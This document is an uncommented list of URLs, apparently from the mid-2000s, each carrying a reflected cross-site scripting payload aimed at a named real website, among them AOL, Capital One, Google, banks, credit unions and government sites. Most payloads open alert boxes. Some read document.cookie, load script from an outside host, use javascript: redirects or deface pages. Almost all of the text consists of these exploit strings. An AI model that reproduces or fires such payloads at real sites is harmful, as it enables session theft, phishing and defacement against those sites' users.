http://www.dexonline.com/servlet/ActionServlet;DexSESSIONID=Fa4mbuRN6oddZnxrt0eV0MNg7tIHsWhZBwyXYSBiT62bsMpS8zJY!1552416804?pid=blistings&queryType=¢erCity=¢erState=¢erLabel=Last&PREVIOUS_PAGE=bsearch&from=7GGL38255&queryText=&distance=10¢erAddress=Enter+street+address&cityText=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&state=AL&surroundingAreas=true http://pd.startribune.com/sp?aff=3&keywords=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E http://movies.excite.com/MovieSummary.jhtml?title=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E http://www.netgear.com/Search.aspx?text=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http://www.congress.org/congressorg/dbq/issuesdbq/votesearch.dbq?command=subjectres&subj=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&field=title&chamber=H&congress=1092&submit.x=0&submit.y=0&submit=go http://www.pizzahut.com/search/default.asp?qu=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit_search.x=12&submit_search.y=15 http://www.bankrate.com/brm/searchResults.asp?q=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E&btnG=submit&site=my_collection&client=my_collection&output=xml_no_dtd&getfields=*&web=brm&advSearch=0 http://www.sxc.hu/browse.phtml?f=search&txt=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&w=1&x=23&y=17 http://www.hotels.com/processSearch.do?destination=b2644f42-0050-4026-9e66-b456c017896b%7C%7CSkorping%2C+07%2C+DNK%7C1&paging=1&sortBy=HCOMPICK&searchID=AC102644-17EC-3910-EE92-871D6E90396C&searchMtmPropertySupplierId=&addressID=&searchType=&usertypedcity=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&chooseAlternateDestination=false&propertyIdsToCompareString=&mtnHotelID=&numrooms=1&roomOccupancyString=1%7C%7C2%7C0%7C0&hotelName=hi&priceRangeKey=1&allPropertyTypesSelected=on&pageNumber=1&numProperties=7&inout=&CIMonth=-1&CIDay=-1&CIYear=2006&COMonth=-1&CODay=-1&COYear=2006&hotelname= http://www.tucows.com/search?search_terms=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&search_scope=win&search_adv=0&search_size=&search_size_multi=b http://newmeds.phrma.org/results.php?drug=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&indication=&company=&status= http://search.nortel.com/go/query.jsp?topics=&searchPath=&ql=a&st=1&parId=9&locale=en-US&la=en&site=0&siteSection=0&tx0=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&ql=a&Submit.x=39&Submit.y=15&Submit=Submit&tx1=&tx2=&tx3=&nh=20&inthe=0 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.microtekusa.com/cgi-bin/search.cgi&boolean=AND&case=Insensitive&terms=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.accessdata.fda.gov/scripts/cdrh/cfdocs/cfMAUDE/Results.cfm?SearchString=&SearchYear=&ProductProblem=&DeviceName=&BrandName=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&Manufacturer=&EventType=&KNumber=K&PMANumber=P&ProductCode=&ReportDateFrom=01%2F01%2F2006&ReportDateTo=09%2F29%2F2006&PAGENUM=10&submit=Search http://www.cas.org/cgi-bin/ddssearch.pl?string=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E http://www.officemax.com/max/solutions/main/search/search.jsp?bvc=yes&searchType=product&searchString=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&searchBtn.x=15&searchBtn.y=11 http://www.flightsearch.com/search.php?q=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&btnFlight=Flight+Search http://www.evite.com/app/places/search/venueSearch.do?keywords=&location=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&x=10&y=8&searchFormSubmit=false&category=places http://www.hallmark.com/webapp/wcs/stores/servlet/SearchResultsView?Ntt=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&x=5&y=8&storeId=10001&catalogId=10051&N=35&Ntk=all_fields&Ntx=mode%2Bmatchallpartial&RPP=12&SBQ=yes http://www.dscc.dla.mil/Programs/MilSpec/DocSearch.asp?SrchField=DocNumber&SrchType=Contains&SrchText=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&DocType=DSCCdwg&DocType=VID&DocType=SMD&DocType=DoDISS&DocType=SubDoc&OrderBy=DocNumber http://search.mit.edu/search?q=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&btnG=Search%20MIT%20Libraries&site=mit&client=mit&proxystylesheet=http%3A%2F%2Flibraries.mit.edu%2Fcss%2Fgoogle-libraries.xsl&output=xml_no_dtd&as_dt=i&as_sitesearch=libraries.mit.edu http://images.jsc.nasa.gov/search/search.cgi?textsearch=Go&hitsperpage=5&submit.x=11&submit.y=16&submit=submit&keywords=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E http://shop.garmin.com/orderstatus.jsp?order_number=%3Cscript%20src=//ckers.org/s http://www.nist.gov/nta-bin/query2.cgi?org-title=284%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://origins.firstgov.gov/external/external.jsp?url=javascript%3Aalert%28%22Your%20cookie%20is%3A%20%22%20+%20document.cookie%29 http://americanart.si.edu/search/search_artworks.cfm?noresults='1'&StartRow=1&LastName=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&FirstName=&Title=&Keyword=&Accession=&dosearch=Go&db=all&format=short&artterm=none&themeterm=none&CFID=7322092&CFTOKEN=c1d66d4a1354d8d6-F101E1D3-BE4C-FA24-D78D59AEC730E67F http://www.searchsystems.net/search.php?SEARCH=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&TYPE=2&LIMIT=25 http://heraldtribune.com/apps/pbcs.dll/section?keywords=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&category=SEARCH01&template=search&resultCount=15&source=4&SNum=1&btnG=Go http://www.sciencemag.org/cgi/search?DOI=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&search_doi-submit.x=21&search_doi-submit.y=7&search_doi-submit=search http://www.theatlantic.com/srch/?words=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://thomas.loc.gov/cgi-bin/thomas&database=text&query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E http://rogerebert.suntimes.com/apps/pbcs.dll/classifieds?category=search3&q=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx http://shop.garmin.com/orderstatus.jsp?order_number=%3Cscript%20src=//ckers.org/s%3F http://blog.chinainfo.gov.cn/blog/index.jsp?UserID=%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E http://www.google.com/support/accounts/bin/answer.py?answer=48598&fpUrl=javascript%3Aalert%28document.cookie%29 http://www.google.com/support/accounts/bin/search.py?query=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&ctx=en%3Asearchbox http://help.orkut.com/bin/search.py?ctx=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&query=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D http://www.neopets.com/petcentral.phtml?%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.bestbuy.com/site/olspage.jsp?id=%22;alert('xss');//&type=category&categoryRep=cat01000 http://www.gnc.com/search/noResults.jsp?kw=%3Cscript%3Ealert('xss')%3C%2Fscript%3E http://www.staples.com/webapp/wcs/stores/servlet/StaplesZipCodeAdd?ts=1163744783681&url=StaplesSearch?ts=1163744783672&keyword=%22%3E%3Cimg%20src=%22a%22%20onerror=%22alert('xss')%22%3E&errorUrl=searchnoresults&searchSumUrl=searchresultssummary&searchUnsumUrl=searchresults&categoryId=&searchClassId=&searchSessionState=&searchSkuCount= http://cbs.sportsline.com/video/player?id=123439s&channel=')%2balert('xss http://www.cbs.com/info/user_services/registration/forgot_login.php?email=%3Cscript%3Ealert('xss')%3C/script%3E http://nbc.resultspage.com/search?ts=custom&p=Q&uid=&w=%22%3E%3Cimg%20src=a%20onerror=alert('xss')%3E http://fuse.tv/search.php?PHPSESSID=ec5fc144849c02bda92b5578bbdab8e2&searchstring=%3Cscript%3Ealert('xss')%3C/script%3E&x=0&y=0 http://www.webmd.com/drugs/search.aspx?stype=drug&query=';alert('xss');// http://www.webmd.com/click2.asp?redirect=javascript:alert('xss'%29 http://www.tenaciousdmovie.com/preview/rocktheinternet/rock_overhaul.php?r_url=%22%3E%3Cscript%3Ealert(String.fromCharCode(120,115,115))%3C/script%3E&r_name=Tenacious%20D&r_option=1&r_id=9059 http://cgi1.ebay.fr/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://asdf.com http://www.cbc.ca/programguide/program/index.jsp?program= http://global.yesasia.com/en/CountryRegion/RegionSelection.aspx?rtnp=Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+PHg= http://www.citimortgage.com/Mortgage/Compare/PostCheckAndCompare.do?propertyCity=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E http://www.usecu.org/home/?pageLabel=home.home_sea&searchQuery=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&x=4&y=9 https://employment.bankofthewest.com/ENG/candidates/default.cfm?szCategory=jobprofile&szOrderID=12478%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&szConcept=1 https://appcenter.usbank.com/fastapp/FastAppRouter?requestCmdId=GOFAST&PRODUCT_CODE=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&SPONSOR=8 http://www.unitedconsumerscu.com/result.php?Keywords=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&r=c%253EeX6qeHWlZ3%253Avd4Wu%255BYK%257BZ4VvZ3%253Au%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Evt%253CVT%253C33%253C2%253C2%253C7363%253A9%253A%253Ctuzmf2%256033%252Fdtt%253C3%253Cjoufsdptnpt%2560joufsobm%2560e3s%2560efsq%253Cotjsfdpwfsz3%253Cotjsfdpwfsz3%253C26878%253C358%253A8%253Cdmfbo%253C%2527enybsht%253E14v4it%253AzpbVIWsUUDF%2560CUOOXLuVbMJdo5iDz33igvMhhP4QkHinJc.DNc8pfM3mO7enCt%257BfY9%257BIorlWlSms2%257Bh%255BkIqcUjXP%253AFKCsMRcRM%2560inumytrXx%2560BxRNQLMEhO%255Bsh%257BDIVMy3.l%257Bw1q9e1dSYUUXbj3GhkYGDLNUUl4TlwT8L8XV3nVdlMhllzjZRj%2560TEqG7UoxZkGrcw1rJgmbCpE%2560sQvJiScPSVF7olXDWWXXlFHEIK43IuJuYKd%253A%25603%255B%253ADXggm%253A%257BgorEOvvWKrwkCvwy%257BhRSrxPUPMuygMCJ8%2560%25604fgYchE%2560%25603.CtSBoXMJR%252F%252F&Submit=Go http://www.unitedcu.org/mainpage.jsp?PageName= https://www.cujc.org/home/?pageLabel=sch&searchQuery=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E http://www.kucu.org/home/?pageLabel=search&searchQuery=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E http://www.postal.org/mainpage.jsp?PageName= http://www.66fcu.org/home/?pageLabel=search&searchQuery=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E https://apply2.capitalone.com/cof.jsp?s=0009629010%27%0Aalert%28%22XSS%22%29%0A%2F%2F http://www.capitalone.ca/redirect.php?dest=https://apply2.capitalone.com/cof.jsp?s=0009629010%27%0Aalert%28%22XSS%22%29%0A%2F%2F http://www.capitalone.com/redirect.php?dest=https://apply2.capitalone.com/cof.jsp?s=0009629010%27%0Aalert%28%22XSS%22%29%0A%2F%2F http://www.capitalone.co.uk/redirect.php?dest=https://apply2.capitalone.com/cof.jsp?s=0009629010%27%0Aalert%28%22XSS%22%29%0A%2F%2F http://www.capitalonemortgages.com/redirect.php?dest=https://apply2.capitalone.com/cof.jsp?s=0009629010%27%0Aalert%28%22XSS%22%29%0A%2F%2F http://www.turkishdailynews.com.tr/search.php?q=%22%3E%3Cscript%3Ealert%28%27Hey+dude...%27%29%3B%3C%2Fscript%3E%3C%22&Submit=Search http://www.imperiaonline.org/imperia/game/top20.php?&c=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.cscoop.ca/Search.asp?query= http://www.ratemyboobies.com/xyzzy/search?search= http://www.shoprogers.com/Search/Results.asp?q=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://neoseeker.com/redirector.php?url=javascript:alert(String.fromCharCode(88,83,83)) http://www.compusa.com/locations/default.asp?loctype=zip&locvalue=%22> http://www.jumperz.net/index.php?i=2&a=0&b='%3Cscript%3Ealert('xss')%3C/script%3E https://my.screenname.aol.com/_cqr/login/login.psp?mcState=initialized&sitedomain=startpage.aol.com&siteState=OrigUrl%3Dhttp%253A//www.aol.com/&i=');alert('xss');// https://reg.my.screenname.aol.com/_cqr/help/infoPopUp.jsp?lang=');alert('xss');//&locale=us https://reg.my.screenname.aol.com/_cqr/registration/initRegistration.psp?mcState=initialized&siteId=ae40_prod&authLev=1&siteState=&lang=');alert('xss');//&locale=us&uitype=flex&seamless=novl&createSn=1&mcAuth=%2FBcAG0Vb3lkAAPd%2BAZRo5UVb3pUIxuzjtrsVcKgAAA%3D%3D http://aolsvc.worldbook.aol.com/wb/Search?st1=%22%3Cscript%3Ealert('xss');%3C/script%3E http://autos.aol.com/?ncid=';alert('xss');// http://billmanagerplus.aol.com/?icid=';alert('xss');// http://blackvoices.aol.com/connect/talk/pagenotfound?404=';alert('xss');// http://cta.aol.com/Pass?_open=true&_container=5&_language=en&D=05/04/2007&T=&_PID=7&CAT=1030&H=00&M=00&L=1440 http://diets.aol.com/dirmodule.adp?_did=91405&_dtype=csv&_dcookie=0&_dpath=diet_fitness,diet_fitness&_dsect=1&dirHeader=';%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://diets.aol.com/dirmodule.adp?_did=91405&_dtype=csv&_dcookie=0&_dpath=_dpath=--%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dsect=1 http://finance.aol.com/usw/quotes/charts?sym=&exch=USA!&pid=&tabs=charts&dr=&icid=';alert('xss');// http://free.aol.com/tryaolfree/wr6_popups/popup.adp?exit_promo=571441&popupData=hasPopup=1&page=/tryaolfree/wr6_popups/popup.adp&creative=%22javascript:alert('xss');%22&url=%22;%7Dalert('xss');function%20a()%7Bf=%22 http://jobs.aol.com/article/_a/now-hiring-seasonal-retail-jobs/20061019144909990007?ncid=';alert('xss');// http://messageboards.aol.com/aol/en_us/articles.php?boardId=557053&articleId=499&func=6&channel=%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E&filterRead=false&filterHidden=true&filterUnhidden=false http://money.aol.com/?icid=';alert('xss');// http://money.aol.com/banking/checking?icid=';alert('xss');// http://money.aol.com/banking?icid=';alert('xss');// http://money.aol.com/basics/index?icid=';alert('xss');// http://money.aol.com/billmanager?icid=';alert('xss');// http://money.aol.com/bp_retire?icid=';alert('xss');// http://money.aol.com/calculators?icid=';alert('xss');// http://money.aol.com/consreports/smartshopping?icid=';alert('xss');// http://money.aol.com/creditdebt/cards?icid=';alert('xss');// http://money.aol.com/creditdebt/debt?icid=';alert('xss');// http://money.aol.com/creditdebt/identity?icid=';alert('xss');// http://money.aol.com/creditdebt/reports?icid=';alert('xss');// http://money.aol.com/financetalk?icid=';alert('xss');// http://money.aol.com/insurance/auto?icid=';alert('xss');// http://money.aol.com/insurance/health?icid=';alert('xss');// http://money.aol.com/insurance/home?icid=';alert('xss');// http://money.aol.com/insurance/life?icid=';alert('xss');// http://money.aol.com/insurance?icid=';alert('xss');// http://money.aol.com/investing/basics?icid=';alert('xss');// http://money.aol.com/investing/choosebroker?icid=';alert('xss');// http://money.aol.com/investing/etf?icid=';alert('xss');// http://money.aol.com/investing/funds?icid=';alert('xss');// http://money.aol.com/investing?icid=';alert('xss');// http://money.aol.com/loans/auto?icid=';alert('xss');// http://money.aol.com/loans/college?icid=';alert('xss');// http://money.aol.com/loans/personal?icid=';alert('xss');// http://money.aol.com/millionaire?icid=';alert('xss');// http://money.aol.com/mortgage/refinancing?icid=';alert('xss');// http://money.aol.com/mortgage?icid=';alert('xss');// http://money.aol.com/news/press_release?icid=';alert('xss');// http://money.aol.com/news/technology?icid=';alert('xss');// http://money.aol.com/news?icid=';alert('xss');// http://money.aol.com/pfhub?icid=';alert('xss');// http://money.aol.com/retirement/401k?icid=';alert('xss');// http://money.aol.com/retirement/403b?icid=';alert('xss');// http://money.aol.com/retirement/basics?icid=';alert('xss');// http://money.aol.com/retirement/ira?icid=';alert('xss');// http://money.aol.com/retirement/living?icid=';alert('xss');// http://money.aol.com/retirement?icid=';alert('xss');// http://money.aol.com/savings?icid=';alert('xss');// http://money.aol.com/specialshub?icid=';alert('xss');// http://money.aol.com/tax/advice?icid=';alert('xss');// http://money.aol.com/tax/basics?icid=';alert('xss');// http://money.aol.com/tax/forms?icid=';alert('xss');// http://money.aol.com/tax/online?icid=';alert('xss');// http://money.aol.com/tax?icid=';alert('xss');// http://money.aol.com/top5/archive?icid=';alert('xss');// http://movies.aol.com/search/dvdresults.adp?query=%3Cscript%3Ealert('xss');%3C/script%3E http://movies.aol.com/search/location-results?csz=%3Cscript%3Ealert('xss');%3C/script%3E http://music.aol.com/search/artistresults.adp?_brndnm=bvmusic&_csnv=bvmusic&query=%22;alert('xss');// http://news.aol.com/?cap=i-foot&photoid=20041203TOK39D.jpg&searchpage=';alert('xss');//&first=8 http://news.aol.com/?icid=';alert('xss');// http://peopleconnection.aol.com/journals/?sitedomain=journals.aol.com&authLev=1&siteState=';alert('xss');// http://premiumservices.aol.com/index.jsp?p=faq&s=%22;alert(%22xss%22);// http://publish.hometown.aol.com/_cqr/_edreg/ed_tos.adp?mturl=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://realestate.aol.com/investment?icid='+alert('xss')// http://ringtones.aol.com/mustSignIn.php?signInRedirect=%22%3E%3Cscript%3Ealert(String.fromCharCode(120,115,115))%3C/script%3E http://smallbusiness.aol.com/grow?icid=';alert('xss');// http://smallbusiness.aol.com/manage?icid=';alert('xss');// http://smallbusiness.aol.com/start?icid=';alert('xss');// http://smallbusiness.aol.com/?icid=';alert('xss');// http://us.video.aol.com/video.index.adp?mode=1&pmmsid=1736875&franchise=';alert('xss');// http://webcenter.polls.aol.com/modular.jsp?template=1177&view=94621&pollId=94704&channel=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3Ca%3E http://webmaster.info.aol.com/cgi-bin/search.pl?term=%3Cimg%20src=a%20onerror=alert('xss')%20%3E http://yellowpages.aol.com/main.adp?_dirnamesearch=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&_dirlocation=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&_diraddressloc=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&_dirchange=1&_diraction=main&_dircat=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirretpage=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://developer.aim.com/?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/acronyms.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/aimexpress.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/chats.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/didyouknow/groupedims.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/download.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/download.adp.old?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/emoticons.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/fun/index.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/get_aim/linux/latest_linux.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/get_aim/mac/latest_macosx.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/get_aim/win/latest_win.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/get_aim/win/other_win.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/help_faq/error_mess/winerrors_buddylist.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/help_faq/gethelp.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/help_faq/report.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/help_faq/security/faq.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/help_faq/starting_out/getstarted.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/help_faq/using/index.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/index.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/international.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/tos/tos.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/tos/privacy_policy.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aim.com/windows/plugins.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://aimtoday.aim.com/redir.adp?at_spot=at_nav5.home.main_puccini.mid&url=%0d%0a%0d%0a%3Cscript%3Ealert('xss')%3C/script%3E http://www.mininova.org/search/?search=%3Chmm%27;%0D%0A//--%3E%3C/script%3E%3Cscript%3E%0D%0Aalert(1337);%0D%0A%3C/script%3E%0D%0A http://www.samsclub.com/eclub/main_clublocator.jsp?isCNP=&zipcode=12345%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://www.samsclub.com/shopping/navigate.do?dest=8&returnTo=http%3A%2F%2Fwww.samsclub.com%2Fshopping%2Fnavigate.do%3Fcatg%3D618'%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://sites.target.com/site/en/spot/map.jsp?streetaddress=&city=&state=&zip12345%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&clientPOI2=1&closestn=3&closestprox=1&miles=200&screen=find&link=results&width=450&height=338&orig_iconid=24&_requestid=1340621 http://searchportal.information.com/?epl=&debug=0&query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E http://search.gifts.com/?q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&x=0&y=0 http://dynamic.si.cnn.com/covers/search?searchSpec=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E http://www.omfg.com/quickResults.asp?searchtype=D&searchfield= http://area.autodesk.com/external.php?link=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3C%22 http://www.haporn.com/video.php?category=md&viewtype=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E%3C%22 http://cbs4boston.com/slideshows/photoalbum_slideshow_324160333/view?slide=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.overclockers.co.uk/search_results.php?sortby=&groupid=&string=%22%3E%27%3E%3CSCRIPT%3Ealert%28%27boom%27%29%3C%2FSCRIPT%3E http://www.youtube.com/signup?signup_type=xss%22%20/%3E%3Cscript%3Ealert(1337)%3C/script%3E http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://nighteffect.com/tns/index.php&SortOrder=Desc%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.santaclarauniv.org/go/esuppress.asp?pin=abcdfuckingpin8&c=111&e=%3Cscript%3Ealert(/omgawhsex/)%3C/script%3E&ln=CBSS http://www.sourcefire.com/elqNow/elqRedir.htm?ref=javascript:alert(%22Hello.%22%29 http://www.snort.org/pub-bin/search.cgi?search=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E https://www.snort.org/reg-bin/userprefs.cgi?action=change_password&new_password=NewPassword&new_password_verify=NewPassword http://promosearch.atomz.com/search/promosearch?query=%27%2F%2F--%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&sp-q=%27%2F%2F--%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&sp_a=sp1000a5a9&sp_f=ISO-8859-1&sp_t=general&sp-x-1=cat&sp-q-1=&sp-x-2=cat2&sp-q-2=&sp-c=25&sp-k=&sp-p=all&sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&c=&p=&counter=&search=New+Search http://search.denverpost.com/sp?aff=26&keywords=%22%3E%3Cscript%3Esay+%3D+prompt%28%27Yo%2C+whats+up%3F+what+do+you+think+about+this+XSS+hole%3F%27%2C%27%27%29%0D%0Aif%28say%29+%7B+alert%28%27You+said%3A%27%2Bsay%29+%7D+else+%7B+alert%28%27Common%21+this+is+fun+%3B%29%27%29%3B+%7D+%3C%2Fscript%3E%3C%22&searchbutton.x=0&searchbutton.y=0&searchbutton=Search http://search.wickedlocal.com/sp?keywords=%3Cscript%3Edocument.write('%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E');%3C/script%3E&search=&p=sb_integrated_search http://cccure.org/modules.php?myh_op=show_all%3Cscript%3Ealert(2)%3C/script%3E http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://cccure.org/modules.php?myh_op=show_allalert(1) http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://www.phpnuke-nederland.com/?myh_op=show_all%3Cscript%3Ealert(1)%3C/script%3E&User-agent=%3Cscript%3Ealert(1)%3C/script%3E https://www.aa.com/apps/redirect/AACruises.jhtml?path=%0D%0A%0A%0D%3Cscript%3Ealert('xss');%3C/script%3Ehttp:// http://dodgeit.com/run/checkmail?mailbox=%3Cimg%20src=a%20onerror=alert('xss')%3E http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.securitypronews.com/submit.php&realname=asdf%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx http://www.airfrance.us/cgi-bin/AF/US/en/local/include/initJsp.do?BV_SessionID=@@@@0725379830.1164531528@@@@&BV_EngineID=ccccaddjhfmmgdlcefecekedfnfdfoj.0 http://bsdvault.net/search.php?query=%22%3E%3CSCRIPT%3Ealert%28%22kefka%20was%20here%22%29%3C%2FSCRIPT%3E http://www.philipmorrisusa.com/en/search/search.asp?criteria=%22%3E%3Cscript%3Ealert%28%27%7C%5F%5F%7C%5F%5F%5F%5F%5F%5F%5F%5F%5F%5F%5F%5F%7C%7C%7C%7C%7E%7E+Up+in+SmOkE%27%29%3B%3C%2Fscript%3E%3C%22&code=noResultsFound 